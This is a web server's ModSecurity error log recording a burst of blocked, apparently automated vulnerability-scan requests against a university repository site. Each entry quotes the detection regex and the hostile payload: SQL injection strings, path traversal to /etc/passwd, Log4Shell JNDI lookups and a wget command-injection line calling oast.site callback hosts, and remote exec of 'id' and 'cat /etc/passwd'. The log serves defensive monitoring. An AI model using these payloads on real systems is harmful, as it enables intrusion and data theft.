[Tue Aug 29 11:30:35.616573 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPOhZIAAAAa"]
[Tue Aug 29 11:30:36.413429 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPxBSoAAAAS"]
[Tue Aug 29 11:30:37.427186 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAOKNosAAAAK"]
[Tue Aug 29 11:30:37.564140 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPMmBAAAAAY"]
[Tue Aug 29 11:30:37.616067 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPv-FQAAAAM"]
[Tue Aug 29 11:30:37.663328 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAOOuWoAAAAW"]
[Tue Aug 29 11:30:39.395758 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPDny0AAAAP"]
[Tue Aug 29 11:30:39.397629 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repository.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAPDny0AAAAP"]
[Tue Aug 29 11:30:39.548862 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAOM4X4AAAAU"]
[Tue Aug 29 11:30:42.499773 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10csCo-f0AAAPXApAAAAAi"]
[Tue Aug 29 11:30:42.584704 2023] [:error] [pid 1010] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAPyOFIAAAAR"]
[Tue Aug 29 11:30:43.314352 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPMmCMAAAAY"]
[Tue Aug 29 11:30:43.447439 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlgjx9emfrmc5618.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPMmCUAAAAY"]
[Tue Aug 29 11:30:44.423848 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPQkgwAAAAe"]
[Tue Aug 29 11:30:45.414117 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPDn0UAAAAP"]
[Tue Aug 29 11:30:47.439051 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAOKNqgAAAAK"]
[Tue Aug 29 11:30:47.488865 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAPOhasAAAAa"]
[Tue Aug 29 11:30:47.535307 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPOhawAAAAa"]
[Tue Aug 29 11:30:48.344109 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAO878cAAAAF"]
[Tue Aug 29 11:30:48.364341 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAPOha4AAAAa"]
[Tue Aug 29 11:30:48.412976 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlg95ur7jrj9666j.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAOKNq4AAAAK"]
[Tue Aug 29 11:30:50.414595 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAPpWfEAAAAI"]
[Tue Aug 29 11:30:51.318809 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAPpWfMAAAAI"]
[Tue Aug 29 11:30:51.354904 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAOM4ZsAAAAU"]
[Tue Aug 29 11:30:51.376160 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgx4wg1rrcxorie.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAOM4ZwAAAAU"]
[Tue Aug 29 11:30:52.360452 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAOOuaYAAAAW"]
[Tue Aug 29 11:30:52.364774 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAPpWfgAAAAI"]
[Tue Aug 29 11:30:53.373293 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAN@5AQAAAAO"]
[Tue Aug 29 11:30:54.466814 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAN@5AwAAAAO"]
[Tue Aug 29 11:30:54.489446 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAPMmEcAAAAY"]
[Tue Aug 29 11:30:55.329452 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAPxBWAAAAAS"]
